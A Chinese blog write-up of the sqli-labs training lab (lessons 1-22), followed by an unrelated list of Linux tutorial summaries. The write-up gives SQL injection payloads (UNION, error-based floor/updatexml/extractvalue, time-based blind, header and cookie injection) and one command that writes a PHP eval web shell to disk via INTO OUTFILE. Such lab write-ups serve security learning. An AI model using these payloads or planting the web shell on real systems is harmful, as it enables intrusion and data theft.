sqli-labs(lesson1-lesson22)

Posted 2023-04-27

参考技术A

插入单引号报错

id被单引号包裹，确认字段数

字段为3，使用union select 1,2,3联合查询语句查看页面是否有显示位

有两个显示位，接下来开始爆库名

爆表

爆列

爆值

插入单引号

由报错判断为数字型注入，注入方法同上，把单引号去掉就好

插入单引号报错，输入?id=1\')--+发现可以正常显示，判定为字符型注入

注入方法同上，在单引号后面加个括号即可

插入单引号没反应，换用双引号后报错，注入方法同上

看到这个报错有可能是布尔型盲注，时间盲注，报错注入
注入

考虑使用报错注入

and (select 1 from (select count( ),concat((payload),floor (rand(0) 2))x from information_schema.tables group by x)a)
其中payload为你要插入的SQL语句
需要注意的是该语句将 输出字符长度限制为64个字符

and updatexml(1,payload,1)
同样该语句对输出的字符长度也做了限制，其最长输出32位
并且该语句对payload的反悔类型也做了限制，只有在payload返回的不是xml格式才会生效

and extractvalue(1, payload)
输出字符有长度限制，最长32位。

使用floor报错语句注入

输出信息超过一行，只能用limit 0,1一个个输出了

库名出来了，接下来方法就和之前一样了

同样的原理，把?id=1\'的单引号换成双引号就行

输入?id=1

输入?id=1 and 1=2回显正常，不是数值型注入
尝试加入单引号发现报错，换成双引号也是一样，加上）依然报错
输入id=5\')) --+

使用语句

写入成功
上传木马，使用cknife链接
?id=-1\')) union select 1,"<?php @eval($_POST[\'chopper\']);?>",3 into outfile "D:\\Software\\phpstudy\\PHPTutorial\\mysql\\muma.php" --+

输入?id=2\' --+回显正常

字符型注入，方法同上

输入?id=1\' and sleep(5) --+存在延迟，判断为延迟型注入

同上，单引号换双引号

登陆界面，使用万能密码

登陆成功，开爆
爆库：

爆表：

爆字段：

之后方法同上

页面无返回信息，只能进行盲注
猜长度
admin\') or length(database())>要猜的长度 and sleep(5)#
猜库名：
admin\') or left(version(),1)>\'要猜的库名\' and sleep(5)#
猜表名：
admin\') or ascii(substr((select table_name from information_schema.tables
where table_schema=database() limit 0,1),1,1))>要猜的表名ASCII and sleep(5)#

之后方法同上

之后方法同上

和上面一样，无返回信息，但是可以使用延时注入判断注入点

其余同上

做到自闭，查看源码

莫得用户名和密码注入了

查看源码

存在利用构造User Agent进行注入的可能，上brupsuit抓包改User Agent

得到mysql版本

同理，可得表名等信息
表名

Refer注入

查看源码

存在cookie注入

其他同理

和上题一样，属于cookie注入，先看源码

和上题基本一样，之不过给用户名（uname）进行了base64加密，对注入语句进行加密即可

报错注入

与上题基本一样，\'改成”即可

Unix And Linux

摘抄与于：http://www.cnblogs.com/awpatp/category/200255.html

vi命令速查图

摘要: Lesson 1 Lesson 2 Lesson 3 Lesson 4 Lesson 5 Lesson 6 Lesson 7阅读全文

 

[转载]Putty中文乱码解决方法

摘要: 以下解决方案内容转自百草园的文章<<putty 中文乱码解决方法>> 方法一: 打开putty主程序，选择window-〉Appearance-〉Font settings-〉Change...,选择Fixedsys字体,字符集选择CHINESE_GB2312。 在window-〉Appearance -〉Translation中，Received data assumed ...阅读全文

 

如何在Ubuntu上让root帐号可以登录SSH

摘要: 参照文章<<如何在ubuntu中启用SSH服务>>的步骤, enable了我Ubuntu上的SSH. 但是发现root帐号不能访问SSH, 报Access Denied. 我follow了这篇文章<<Allow root account to use SSH (openssh)>>的步骤, 还是不可以用root帐号在putty上ssh到我的Ubuntu上. Ubuntu操作系统对r...阅读全文

 

[转]激活root帐号并允许登录

摘要: Ubuntu 中的 root 帐号默认是被禁用了的。在这种情况之下，如果你想要使用 root 的权限来干些事情，就需要 sudo 指令。对某些朋友来说，他们可能需要激活 Ubuntu 中的 root 帐号。 在 Ubuntu 中激活 root 帐号的过程如下： 1. 在终端执行 sudo passwd root 指令后，系统将会提示你设置一个新的 root 帐号密码。 2. 点击 System ...阅读全文

 

Ubuntu游戏集合

摘要: 大家都说Linux不是用来玩游戏的, 有道理. 不过Linux若要真正的牢牢的占据用户的桌面, 娱乐绝对是不可少的. 真正用电脑来工作学习的多呢, 还是用电脑玩的多呢? 呵呵, 不多废话了. 转贴文章如下,  我照着安装了一个百战天虫, 还没开始玩. 就是觉得这个可行, 就贴出来了.   游戏 ＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝ 这个游戏使用了quake3的引擎，所以画...阅读全文

 

Linux与Window文件共享

摘要: Ubuntu中访问windows文件: Samba 1. 在Windows设置网络共享, 而且还必须有一个拥有访问共享权限的用户. 2. Linux下运行        sudo mount –t cifs –o username=test,password=password123 //192.168.1.101/ShareFolder...阅读全文

 

Linux应用篇

摘要: 分辨率配置文件: cat /etc/X11/xorg.conf 如果找不到所要的分辨率, 那么我们需要编辑/etc/X11/xorg.conf文件来添加自己需要的分辨率. 查看帮助可以使用man xorg.conf命令.   小技巧: 在man帮助中如何查找? 可以在man中输入一个/, 然后输入你要查找的单词, 用n, N来向前向后查找单词. 如何搜索多个单词? 我不知道. 如...阅读全文

 

Linux文件编辑器 vi

摘要: 作者：北南南北 来自：LinuxSir.Org 摘要：vi 编辑器是最常用的文档创建和编辑工具，初学者应该学会简单应用vi ，学会在vi 中做简单的修改、删除、插入、搜索及替换作业；如果您是新手，不妨看看本文，或许这篇文档能让您在最短的时间内学会vi的简单操作； 目录 1、关于文本编辑器； 2、vi 编辑器； 3、vi 编辑器的使用方法； 3.1 如何调用vi ； 3.2 vi 的三种命令模式...阅读全文

 

Sudo 和 Root 帐号

摘要: 在 Ubuntu 中， 传统 UNIX \'root\' 被屏蔽了 (也就是 你不能使用 root 来登录). 这样选择的原因在本文的后面做出描述。 Hiweed Linux 采用 Xubuntu 软件库，所以也继承了 Ubuntu 的这一特点。 使用 root 权限执行命令, 在每个命令前面加上 \'sudo\' 命令, 例如 sudo chown bob * 你将会提示输入你的口令, 口令将保存 15...阅读全文

 

Linux基本命令篇的习题解答

摘要: 1. 练习cmd --help, help cmd, man cmd, info cmd, 比较其不同, 找到命令的使用方法. 答: 经过我的测试, 以ls为例, ls --help有中文帮助, 一次性显示完成并推出. help ls的结果bash: help: 没有匹配 "ls" 的帮助主题. 尝试"help help", 或者"man –k ...阅读全文

 

[转]Linux用户口令的管理

摘要: 用户管理的一项重要内容是用户口令的管理。 用户账号刚创建时没有口令，是被系统锁定的，无法使用，必须为其指定口令后才可以使用，即使是空口令。 指定和修改用户口令的Shell命令是passwd。超级用户可以为自己和其他用户指定口令，普通用户只能修改自己的口令。 命令的格式为： 代码: passwd 选项 用户名 可使用的选项： -l 锁定口令，即禁用账号。 -u 口令解锁。 -d 使账号无口令。...阅读全文

 

[转]Linux查看磁盘使用情况命令

摘要: 一、df -lh 命令 df 是来自于coreutils 软件包，系统安装时，就自带的；我们通过这个命令可以查看磁盘的使用情况以及文件系统被挂载的位置； [root@localhost ~]# df -l 文件系统               
...阅读全文

 

[转]Linux下shell的工作原理

摘要: Linux中有多种shell，其中缺省使用的是Bash。本章讲述了shell的工作原理，shell的种类，shell的一般操作及Bash的特性。 shell是用户和Linux操作系统之间的接口。Linux中有多种shell，其中缺省使用的是Bash。本章讲述了shell的工作原理，shell的种类，shell的一般操作及Bash的特性。 什么是shell Linux系统的shell作为操作系统的外...阅读全文

 

Linux基本命令篇 - 关机命令

摘要: 关机 poweroff halt shutdown –h now init 0 以上四个命令是等效的. 普通用户没有权限关机, 执行以上命令必须使用sudo. 注意不要使用poweroff -f, f开关是指force, 意为强制关机.   下图为海明老师给出的思考练习题.   Windows中只有一个时钟, 即BIOS时钟. Linux的时钟是一个软时钟, 开...阅读全文

 

Linux基本命令篇 - 任务管理

摘要: 单次任务(job): 只执行一次. at 编辑任务     关机命令 sudo poweroff     创建成功之后, 会返回一个job ID. atq 查询任务     用该命令查询指定ID的job, 或者不指定job id, 查看job. 注意, 如果想要查询一个管理员权限才能执行的job, 那么运行a...阅读全文

 

Linux基本命令篇 - 压缩包管理

摘要: 最常用的压缩包是tar, gz, bz2. zip和rar主要是从windows上来的. 把多个文件打包成一个文件, 一般尺寸并没有变化, 这叫打包. 把一个文件的大小进行缩减, 这叫压缩. 压缩有两种,一种叫有损压缩, 另一种是无损压缩. 标准是解开压缩之后是不是与被压缩之前是一模一样的, 一模一样的就叫无损压缩. mp3, jpg, rm这几种格式属于有损压缩, 因为注重的是压缩率. ...阅读全文

 

Linux基本命令篇 - 启动管理

摘要: 启动分析 Windows的启动, 硬盘0到1扇区会有一个MBR. BIOS会读取MBR, MBR中存有Windows启动的引导程序. Linux系统中有一个Swap分区, 该分区是用来模拟内存的. Linux系统会安装在一个另外的分区上. Linux会修改MBR, 修改后的MBR在启动之后会先找到安装了Linux分区的grub.  BIOS会调用安装了Linux的分区里的grub启动...阅读全文

 

Linux基本命令篇 - 网络管理

摘要: 网络的五个元素: MAC地址, IP地址, 网络掩码, 网关, DNS MAC地址也就是网卡的物理地址, 该地址是全球唯一的, 长度为六个字节. IP地址是四个字节, 是分配给网卡的一个逻辑地址. 网络掩码是三十二个字节, 判断一个地址是局域网还是广域网, 如果是局域网在网内发送, 如果是广域网就发送给网关. DNS是讲名字与IP地址相互转化的一种服务.   网络命令 pi...阅读全文

 

Linux基本命令篇 - 系统管理

摘要: 环境变量 env export DISPLAY=localhost:0.0 该命令修改了环境变量中的DISPLAY的值为localhost:0.0   系统日期 date 运行时间 time 该命令用来计算一个程序需要多长时间 time gcalctool 该命令启动一个计算机进程, 并且计时. 结束计算器运行的时候, 终端中会返回一共运行的时间, cpu耗费的时间, 用户耗费的时间...阅读全文

 

Linux基本命令篇 - 进程管理

摘要: 查看: ps ps aux 该命令返回详细的进程信息. TTY代表终端是哪一个, 系统启动的进程终端用?表示. 认为的可以是tty1, tty2等. STAT代表进程的状态 进程树: pstree 列举了所有进程之间的关系. 杀死进程: kill, pkill, xkill kill [PID] 杀死进程标识为PID的进程. pkill [进程名] 指定一个进程名来杀掉该进程. x...阅读全文

 

Linux基本命令篇 - 用户管理

摘要: 添加用户: useradd -u UID 指定新用户的uid, 默认使用当前最大UID加1 -g group 指定新用户所在的组 -G 指定新用户的附加组 -d 指定新用户的家目录 -s 指定新用户使用的shell, 默认为bash -c 附加信息 -e 指定用户失效时间 -m 建立新用户的家目录 查看用户的基本情况: id user1 该命令查看user1的基本情况. 只输入i...阅读全文

 

Linux基本命令篇 - 磁盘管理

摘要: FS容量: df df -h命令, h是human的简写, 启动这个开关之后, 信息更加易读取. 结果当中的tmpfs指的内存中的一个系统. 想查看Swap分区需要用free命令.   目录容量: du /bin -h 该命令显示出bin文件夹用了多少空间. sudo du / –hs 该命令查看根目录中使用情况, 查看总数.   磁盘分区: fdisk, cfd...阅读全文

 

Linux 基本命令篇 - 目录管理

摘要: 创建目录命令: mkdir folder1 该命令在当前目录下创建目录folder1 mkdir f1 f2 /home/user1/f3 该命令可以同时创建三个目录.   删除目录命令: rmdir folder1/f1 该命令使用相对路径删除f1文件夹 rmdir /home/user1/folder1/f2 该命令使用绝对路径删除f2文件夹 rm –r f3 该命令使用r...阅读全文

 

Linux基本命令篇 - 文件管理

摘要: 什么是文件系统? 文件系统是操作系统在分区上保存文件信息的方法和数据结构. Linux文件系统具有类似的通用结构, 其关键组成部分有:     超级块 super block     索引节点 inode     数据块 data block     目录块 dire...阅读全文

 

Linux 知识点滴

摘要: Linux的原作者是谁? Linus Torvalds, 托瓦兹. 操作系统应该包括哪两个部分? 一个是[核心与其提供的接口工具], 另一个是[利用核心提供的接口工具所开发出来的软件]. Linux的发展分为两种版本,哪两种? 稳定版本的偶数版, 如2.6.x, 适合与商业与家用环境使用; 发展中版本的奇数版, 适合开发特殊功能的环境. 操作系统至少包括哪几本部分? 输入输出单元, ...阅读全文

 

Linux 基本命令篇 - 计算机信息

摘要: 在Linux中, 查看计算机的基本配置信息需要使用命令行的方式. proc目录是内存中信息的挂载点. CPU 在/proc/cpuinfo 内存 在/proc/meminfo 硬盘 在fdisk 显卡等 在lspci U盘 lsusb 驱动 lsmod kernel版本 uname Ubuntu版本 /etc/issue 操作系统是kernel, Ubuntu只能说是kerne...阅读全文

 

Linux基本命令篇 - ls详解

摘要: ls命令输出的结果包含下面的部分, 其解释如下.-rw-r—r--drwxr-r-xr-x开头的第一个字母, 如果是-说明是一个文件,开头是d说明是一个文件夹.r代表读, w代表写, x代表执行. 对于文件来讲x代表可执行, 对于目录来讲x代表目录可以进入.头第二个到第五个字母代表主人的权限,...阅读全文

 

Linux 基本命令 - ls

摘要: 不懂基本命令,就不懂linux. Linux是多用户,多任务的操作系统. Windows也是. 不过windows一般是一个人单独使用. 很少有很多人同时使用一台机器. (Windows server 2003可以开启多个remote终端, 多用户使用,我用过的.)   绝对路径与相对路径 绝对路径- 以/为起始. 比如 /home/user1/abc.txt 相对路径- 没有/...阅读全文

 

Linux 基本命令 - 目录结构

摘要: Windows将硬盘分成多个分区, 那么就相当于多个根. Linux中的多个分区的情况下, 只有一个root, 其他的分区(挂载)映射目录到root之下. 访问目录根, 就用一个斜杠就可以了(/). Windows中软盘: A:\\ Linux中: /mnt/floppy/ Linux的bin目录, 存放的都些命令, 也就是可执行文件.   sbin目录, (super\'s bin...阅读全文

 

第一次解决Ubuntu的问题- 忘记用户名

摘要: 说来很傻，竟然忘记了当初安装Ubuntu的用户名。密码倒还记得。 其实重装也不是麻烦事儿，不过上次运行Ubuntu的时候下载了好多东西，更新了好多东西（我不记得了）。好像更换了下载服务器，选了个台湾的，于是下载更新超快！还搞了个中文包什么的。实在是不想再走一遍。 于是上网找资料。 解决方案如下： 1、打开电脑，当屏幕上出现"Press Esc to enter grub mess...阅读全文